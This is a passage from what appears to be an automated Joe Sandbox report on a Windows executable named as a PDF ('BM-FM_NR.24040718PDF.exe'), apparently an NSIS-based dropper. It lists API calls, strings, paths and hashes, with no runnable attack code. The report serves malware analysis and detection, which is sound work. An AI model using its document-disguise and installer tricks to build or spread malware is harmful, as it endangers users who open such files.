40342b ExitProcess 4277->4276 4278 40554e MessageBoxIndirectA 4277->4278 4278->4276 4280 4060c8 5 API calls 4279->4280 4281 403438 lstrcatA 4280->4281 4281->4139 4281->4140 4283 40347a 4282->4283 4284 40545f GetLastError 4282->4284 4283->4152 4284->4283 4285 40546e SetFileSecurityA 4284->4285 4285->4283 4286 405484 GetLastError 4285->4286 4286->4283 4288 40549b 4287->4288 4289 40549f GetLastError 4287->4289 4288->4152 4289->4288 4290->4155 4291->4158 4293 4054f3 CloseHandle 4292->4293 4294 4054ff 4292->4294 4293->4294 4294->4158 4296 4059dc GetTickCount GetTempFileNameA 4295->4296 4297 40310d 4296->4297 4298 405a09 4296->4298 4297->4102 4298->4296 4298->4297 4299->4183 4300->4185 4301->4189 4303 402c23 4302->4303 4304 402c0b 4302->4304 4307 402c33 GetTickCount 4303->4307 4308 402c2b 4303->4308 4305 402c14 DestroyWindow 4304->4305 4306 402c1b 4304->4306 4305->4306 4306->4193 4309 402c41 CreateDialogParamA ShowWindow 4307->4309 4310 402c64 4307->4310 4315 406104 4308->4315 4309->4310 4310->4193 4313->4199 4314->4201 4316 406121 PeekMessageA 4315->4316 4317 402c31 4316->4317 4318 406117 DispatchMessageA 4316->4318 4317->4193 4318->4316 4320 403988 4319->4320 4330 405c8d wsprintfA 4320->4330 4322 4039f9 4323 405d51 18 API calls 4322->4323 4324 403a05 SetWindowTextA 4323->4324 4325 403734 4324->4325 4326 403a21 4324->4326 4325->4222 4326->4325 4327 405d51 18 API calls 4326->4327 4327->4326 4328->4219 4329->4224 4330->4322 4332 403628 4331->4332 4333 4035f2 4332->4333 4334 40362d FreeLibrary GlobalFree 4332->4334 4333->4273 4334->4333 4334->4334 4335 402410 4336 402b44 19 API calls 4335->4336 4337 40241a 4336->4337 4338 402a3a 18 API calls 4337->4338 4339 402423 4338->4339 4340 40242d RegQueryValueExA 4339->4340 4342 4026a6 4339->4342 4341 40244d 4340->4341 4345 402453 RegCloseKey 4340->4345 4341->4345 4346 405c8d wsprintfA 4341->4346 4345->4342 4346->4345 4347 401f90 4348 401fa2 4347->4348 4349 402050 4347->4349 4350 402a3a 18 API calls 4348->4350 4351 401423 25 API 
calls 4349->4351 4352 401fa9 4350->4352 4358 4021c9 4351->4358 4353 402a3a 18 API calls 4352->4353 4354 401fb2 4353->4354 4355 401fc7 LoadLibraryExA 4354->4355 4356 401fba GetModuleHandleA 4354->4356 4355->4349 4357 401fd7 GetProcAddress 4355->4357 4356->4355 4356->4357 4359 402023 4357->4359 4360 401fe6 4357->4360 4363 404f48 25 API calls 4359->4363 4361 402005 4360->4361 4362 401fee 4360->4362 4368 100016bd 4361->4368 4410 401423 4362->4410 4365 401ff6 4363->4365 4365->4358 4366 402044 FreeLibrary 4365->4366 4366->4358 4369 100016ed 4368->4369 4413 10001a5d 4369->4413 4371 100016f4 4372 1000180a 4371->4372 4373 10001705 4371->4373 4374 1000170c 4371->4374 4372->4365 4462 100021b0 4373->4462 4445 100021fa 4374->4445 4379 10001770 4385 100017b2 4379->4385 4386 10001776 4379->4386 4380 10001752 4475 100023da 4380->4475 4381 10001722 4384 10001728 4381->4384 4390 10001733 4381->4390 4382 1000173b 4395 10001731 4382->4395 4472 10002aa3 4382->4472 4384->4395 4456 100027e8 4384->4456 4388 100023da 11 API calls 4385->4388 4392 10001559 3 API calls 4386->4392 4393 100017a4 4388->4393 4389 10001758 4486 10001559 4389->4486 4466 10002589 4390->4466 4397 1000178c 4392->4397 4401 100017f9 4393->4401 4497 100023a0 4393->4497 4395->4379 4395->4380 4400 100023da 11 API calls 4397->4400 4399 10001739 4399->4395 4400->4393 4401->4372 4403 10001803 GlobalFree 4401->4403 4403->4372 4407 100017e5 4407->4401 4501 100014e2 wsprintfA 4407->4501 4408 100017de FreeLibrary 4408->4407 4411 404f48 25 API calls 4410->4411 4412 401431 4411->4412 4412->4365 4504 10001215 GlobalAlloc 4413->4504 4415 10001a81 4505 10001215 GlobalAlloc 4415->4505 4417 10001cbb GlobalFree GlobalFree GlobalFree 4418 10001cd8 4417->4418 4437 10001d22 4417->4437 4419 1000201a 4418->4419 4427 10001ced 4418->4427 4418->4437 4421 1000203c GetModuleHandleA 4419->4421 4419->4437 4420 10001b60 GlobalAlloc 4442 10001a8c 4420->4442 4422 10002062 4421->4422 4423 1000204d LoadLibraryA 4421->4423 4512 100015a4 GetProcAddress 

                                                                      Control-flow Graph (function starting at 0040310F)
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE ref: 00403134
                                                                      • GetVersion.KERNEL32 ref: 0040313A
                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                      • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                      • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                      • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                      • GetCommandLineA.KERNEL32(Dominique Setup,NSIS Error), ref: 004031BD
                                                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",00000000), ref: 004031D0
                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",00000020), ref: 004031FB
                                                                      • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                      • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                        • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                        • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                      • OleUninitialize.OLE32(?), ref: 0040340C
                                                                      • ExitProcess.KERNEL32 ref: 0040342D
                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                      • ExitProcess.KERNEL32 ref: 004035CF
                                                                        • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                      • String ID: "$"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold$C:\Users\user\Desktop$C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe$Dominique Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K*v$~nsu
                                                                      • API String ID: 3329125770-1715251254
                                                                      • Opcode ID: 8cf9f27780d4a9ffc016deafba261a7cdcbd07a9ed72e1522d1863b0730728e5
                                                                      • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                      • Opcode Fuzzy Hash: 8cf9f27780d4a9ffc016deafba261a7cdcbd07a9ed72e1522d1863b0730728e5
                                                                      • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (function starting at 00405086)
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                      • GetClientRect.USER32(?,?), ref: 00405131
                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                      • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                        • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0040525B
                                                                      • ShowWindow.USER32(00000000), ref: 0040527E
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                      • ShowWindow.USER32(00000008), ref: 004052CB
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                      • CreatePopupMenu.USER32 ref: 00405310
                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                                      • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                      • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                      • EmptyClipboard.USER32 ref: 004053B0
                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                      • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                                      • CloseClipboard.USER32 ref: 00405401
                                                                      Strings
                                                                      • Dominique Setup: Installing, xrefs: 00405376
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: Dominique Setup: Installing
                                                                      • API String ID: 590372296-2270509071
                                                                      • Opcode ID: 178281be4e68d23ddcd88e799edc9527c790cc2d2363fcb1ed2671d56a5acb84
                                                                      • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                                      • Opcode Fuzzy Hash: 178281be4e68d23ddcd88e799edc9527c790cc2d2363fcb1ed2671d56a5acb84
                                                                      • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (function starting at 00405D51)
                                                                      APIs
                                                                      • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,00404F80,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000), ref: 00405E02
                                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E7D
                                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E90
                                                                      • SHGetSpecialFolderLocation.SHELL32(?,0041B020), ref: 00405ECC
                                                                      • SHGetPathFromIDListA.SHELL32(0041B020,Call), ref: 00405EDA
                                                                      • CoTaskMemFree.OLE32(0041B020), ref: 00405EE5
                                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                      • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,00404F80,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000), ref: 00405F59
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 900638850-1078146441
                                                                      • Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                      • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                      • Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                      • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                      • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                      • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                      • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                      • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                      • String ID:
                                                                      • API String ID: 4227406936-0
                                                                      • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                      • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                      • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                      • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DeleteFileA.KERNELBASE(?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                      • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                      • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                      • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                      • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                      • FindClose.KERNEL32(00000000), ref: 00405738
                                                                      Strings
                                                                      • "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe", xrefs: 004055D1
                                                                      • \*.*, xrefs: 0040563C
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                      • API String ID: 2035342205-2943497578
                                                                      • Opcode ID: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                                      • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                      • Opcode Fuzzy Hash: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                                      • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(76293410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,76293410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76293410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                      • FindClose.KERNEL32(00000000), ref: 0040604A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                      • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                                      • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                      • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                      • ShowWindow.USER32(?), ref: 00403A9A
                                                                      • DestroyWindow.USER32 ref: 00403AAE
                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                                      • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403BB4
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                      • EnableWindow.USER32(?,?), ref: 00403D1D
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                                      • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                      • lstrlenA.KERNEL32(Dominique Setup: Installing,?,Dominique Setup: Installing,Dominique Setup), ref: 00403D8E
                                                                      • SetWindowTextA.USER32(?,Dominique Setup: Installing), ref: 00403D9D
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID: Dominique Setup$Dominique Setup: Installing
                                                                      • API String ID: 3282139019-196108764
                                                                      • Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                      • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                      • Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                      • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                        • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                      • lstrcatA.KERNEL32(1033,Dominique Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Dominique Setup: Installing,00000000,00000002,76293410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",00000000), ref: 0040372A
                                                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes,1033,Dominique Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Dominique Setup: Installing,00000000,00000002,76293410), ref: 0040379F
                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                                      • GetFileAttributesA.KERNEL32(Call), ref: 004037BD
                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes), ref: 00403806
                                                                        • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                      • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                                      • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                                      • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                                      • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes$Call$Control Panel\Desktop\ResourceLocale$Dominique Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph (node and edge listing omitted): starts at 402c66; API calls in graph: GetTickCount, GetModuleFileNameA, GetFileSize, GlobalAlloc, SetFilePointer
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402C77
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,00000400), ref: 00402C93
                                                                        • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 004059A6
